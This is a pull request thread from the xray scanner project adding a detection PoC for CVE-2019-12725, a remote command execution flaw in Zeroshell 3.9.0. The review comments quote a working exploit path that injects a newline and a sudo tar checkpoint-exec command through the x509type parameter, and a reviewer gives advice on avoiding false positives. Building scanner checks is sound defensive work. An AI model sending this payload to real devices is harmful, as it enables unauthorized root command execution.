Zeroshell-cve-2019-12725.yml
chaitin/xray pull request #971
Opened 2020-12-30 16:35 UTC by D4ch1au

## 本 poc 是检测什么漏洞的
Zeroshell 是一个微型的linux发行版本软路由， 3.9.0版本存在远程命令执行漏洞。
## 测试环境
私聊
## 备注

2021-01-05 02:46 UTC, zema1 requested changes

2021-01-05 02:46 UTC, zema1 commented on pocs/zeroshell-cve-2019-12725-rce.yml
> +    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22echo%20{{r1}}%22%
对于 linux shell 的命令执行，建议使用 `expr rand1 - rand2` 计算一个表达式的方式。直接 echo 会有一种情况很容易误报：把 url 直接输出在了响应里，类似反射型 xss。

2021-01-05 03:57 UTC, D4ch1au reviewed
这下应该可以了

2021-01-05 03:57 UTC, D4ch1au commented on pocs/zeroshell-cve-2019-12725-rce.yml
> +    path: /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0A%2Fetc%2Fsudo+tar+-cf+%2Fdev%2Fnull+%2Fdev%2Fnull+--checkpoint%3d1+--checkpoint-action%3dexec%3d%22echo%20{{r1}}%22%
好的，这边已经改了。

2021-01-06 02:18 UTC, zema1 commented
太强了 感谢大佬~

2021-01-06 02:18 UTC, merged